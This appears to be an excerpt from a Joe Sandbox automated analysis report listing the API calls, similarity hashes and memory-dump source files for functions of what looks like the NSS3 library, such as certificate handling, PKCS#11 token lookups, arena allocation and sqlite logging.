                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3167935723-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 27a619c36e7991192836036528aa05fde89358cf3fec2507db0767275d158d1e
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 53dc1e515c054442c80461b76bc4c21590975f335e96d45bc05fdfa1a84a3dcb
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27a619c36e7991192836036528aa05fde89358cf3fec2507db0767275d158d1e
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F61B6B5A00300AFEB605EA5DC41FA776B9EF4474CF284068FE099AB62F721D915C7B1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB3440: PK11_GetAllTokens.NSS3 ref: 6CEB3481
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB3440: PR_SetError.NSS3(00000000,00000000), ref: 6CEB34A3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB3440: TlsGetValue.KERNEL32 ref: 6CEB352E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB3440: EnterCriticalSection.KERNEL32(?), ref: 6CEB3542
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB3440: PR_Unlock.NSS3(?), ref: 6CEB355B
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CEB3D8B
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CEB3D9F
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CEB3DCA
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6CEB3DE2
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CEB3E4F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF0C2BF
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CEB3E97
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CEB3EAB
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CEB3ED6
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6CEB3EEE
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2554137219-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: d24ca68a6801730301306cc5924464bc4b913ba56d863ac564c737aec349faa9
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 3d4d91761be5be63b84f873cdd1f3ede8e1da0a47235758f759a22cdc36c348c
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d24ca68a6801730301306cc5924464bc4b913ba56d863ac564c737aec349faa9
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84512271E002008FDB01AF28D986B7B73B0AF4531CF25012AEE0967B22EF31E955CB91
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(9543BF6C), ref: 6CE62C5D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0D30: calloc.MOZGLUE ref: 6CEC0D50
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0D30: TlsGetValue.KERNEL32 ref: 6CEC0D6D
                                                                                                                                                                                                                                                                                                                      • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6CE62C8D
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CE62CE0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE62E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CE62CDA,?,00000000), ref: 6CE62E1E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE62E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CE62E33
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE62E00: TlsGetValue.KERNEL32 ref: 6CE62E4E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE62E00: EnterCriticalSection.KERNEL32(?), ref: 6CE62E5E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE62E00: PL_HashTableLookup.NSS3(?), ref: 6CE62E71
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE62E00: PL_HashTableRemove.NSS3(?), ref: 6CE62E84
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE62E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CE62E96
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE62E00: PR_Unlock.NSS3 ref: 6CE62EA9
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE62D23
                                                                                                                                                                                                                                                                                                                      • CERT_IsCACert.NSS3(00000001,00000000), ref: 6CE62D30
                                                                                                                                                                                                                                                                                                                      • CERT_MakeCANickname.NSS3(00000001), ref: 6CE62D3F
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE62D73
                                                                                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(?), ref: 6CE62DB8
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE ref: 6CE62DC8
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE63E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE63EC2
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE63E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CE63ED6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE63E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CE63EEE
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE63E60: PR_CallOnce.NSS3(6CFC2AA4,6CEC12D0), ref: 6CE63F02
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE63E60: PL_FreeArenaPool.NSS3 ref: 6CE63F14
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE63E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CE63F27
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3941837925-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: d5dc5edc45854d6eec4e76bc28b4203921dcf3bd7cdb26688923ce5141c94c1e
                                                                                                                                                                                                                                                                                                                      • Instruction ID: a06a002df6e483999f8aab29959cfc34f7c762c70ffa7ed9e67a2f189039c6f8
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5dc5edc45854d6eec4e76bc28b4203921dcf3bd7cdb26688923ce5141c94c1e
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C51DE71A642119BDB019E2ACC88B5B7BF5EFA434CF24082CEC5593B51E731E8158B92
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6CE7DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CE88FAF
                                                                                                                                                                                                                                                                                                                      • PR_Now.NSS3(?,?,00000002,?,?,?,6CE7DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CE88FD1
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CE7DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CE88FFA
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CE7DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CE89013
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CE7DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CE89042
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CE7DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CE8905A
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CE7DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CE89073
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CE7DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CE890EC
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE50F00: PR_GetPageSize.NSS3(6CE50936,FFFFE8AE,?,6CDE16B7,00000000,?,6CE50936,00000000,?,6CDE204A), ref: 6CE50F1B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE50F00: PR_NewLogModule.NSS3(clock,6CE50936,FFFFE8AE,?,6CDE16B7,00000000,?,6CE50936,00000000,?,6CDE204A), ref: 6CE50F25
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CE7DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CE89111
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2831689957-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: d1b035de0a2ec717a41a7f37cfe5c8f5bc294eb94c9c05330c51941608dea88b
                                                                                                                                                                                                                                                                                                                      • Instruction ID: bc345e815f46e06d349298e9ab92da3f119bc633674039cd2c575a17278c9f17
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1b035de0a2ec717a41a7f37cfe5c8f5bc294eb94c9c05330c51941608dea88b
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B5518A71E056058FCB40EF78C48835ABBF0BF0A318F265569DC489B706EB35E985CB91
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE640D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6CE63F7F,?,00000055,?,?,6CE61666,?,?), ref: 6CE640D9
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE640D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6CE61666,?,?), ref: 6CE640FC
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE640D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6CE61666,?,?), ref: 6CE64138
                                                                                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6CE67CFD
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29BF0: TlsGetValue.KERNEL32(?,?,?,6CF70A75), ref: 6CF29C07
                                                                                                                                                                                                                                                                                                                      • SECITEM_ItemsAreEqual_Util.NSS3(?,6CF89030), ref: 6CE67D1B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6CE61A3E,00000048,00000054), ref: 6CEBFD56
                                                                                                                                                                                                                                                                                                                      • SECITEM_ItemsAreEqual_Util.NSS3(?,6CF89048), ref: 6CE67D2F
                                                                                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6CE67D50
                                                                                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6CE67D61
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6CE67D7D
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CE67D9C
                                                                                                                                                                                                                                                                                                                      • CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6CE67DB8
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE023,00000000), ref: 6CE67E19
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 70581797-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 7bebbbb44093324ae8d31cfd292b73671093a948a080eb47085f53d84d8bafd0
                                                                                                                                                                                                                                                                                                                      • Instruction ID: ab68d929ce2ea4bb276df60bbc26b6bfc8e2045429c462f6a7765481208b87c8
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7bebbbb44093324ae8d31cfd292b73671093a948a080eb47085f53d84d8bafd0
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3410772A501199BDB008E6ADC41BAF37F4AF4235CF250428EC15A7F50E734ED15C7A2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?,00000000,00000000,?,?,?,6CE780DD), ref: 6CE77F15
                                                                                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,6CE780DD), ref: 6CE77F36
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,6CE780DD), ref: 6CE77F3D
                                                                                                                                                                                                                                                                                                                      • SECOID_Shutdown.NSS3(00000000,00000000,?,?,?,6CE780DD), ref: 6CE77F5D
                                                                                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,6CE780DD), ref: 6CE77F94
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CE77F9B
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE08B,00000000,6CE780DD), ref: 6CE77FD0
                                                                                                                                                                                                                                                                                                                      • PR_SetThreadPrivate.NSS3(FFFFFFFF,00000000,6CE780DD), ref: 6CE77FE6
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?,6CE780DD), ref: 6CE7802D
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: free$CriticalDeleteSection$ErrorPrivateShutdownThread
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 4037168058-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 926c76d3976d954beee3eaa65fb7fb464bd13574f32814d9034752a30effa899
                                                                                                                                                                                                                                                                                                                      • Instruction ID: e11adcd872a1f9d3fa7f77ea57c7e04ca952f9cda5b1086bbdd73716cfd76a89
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 926c76d3976d954beee3eaa65fb7fb464bd13574f32814d9034752a30effa899
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C941F5B1F212004BDB649FB98CC9B4B37B9EB87358F261229E51593B40DB329505CBB1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEBFF00
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF0C2BF
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6CEBFF18
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CEBFF26
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6CEBFF4F
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CEBFF7A
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CEBFF8C
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: ArenaUtil$Alloc_Mark_$ErrorValuememset
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1233137751-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 23b09a563bdd3c2c2893d07590e7cb22f8d8a67fc6224ede247ab19640d7f111
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 95c73ad49f59e390259060f8a352dd67e06da05978e40c8ff4e2e46ec5cf3f29
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23b09a563bdd3c2c2893d07590e7cb22f8d8a67fc6224ede247ab19640d7f111
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B13126FEA017229BE7108E549E42B6B76B8AF4634CF350139ED28A7B40E774D914C7D2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE07E27
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE07E67
                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6CE07EED
                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CE07F2E
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                      • API String ID: 912837312-598938438
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 5bfdbb0cd361ab16ba04a724636261d04c85e1672fb761a3799221e8e0885900
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 3f0af09e7e4d94fa4731d7154f157f8bffe6fc4c882daf0f5e1f19706f62f306
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5bfdbb0cd361ab16ba04a724636261d04c85e1672fb761a3799221e8e0885900
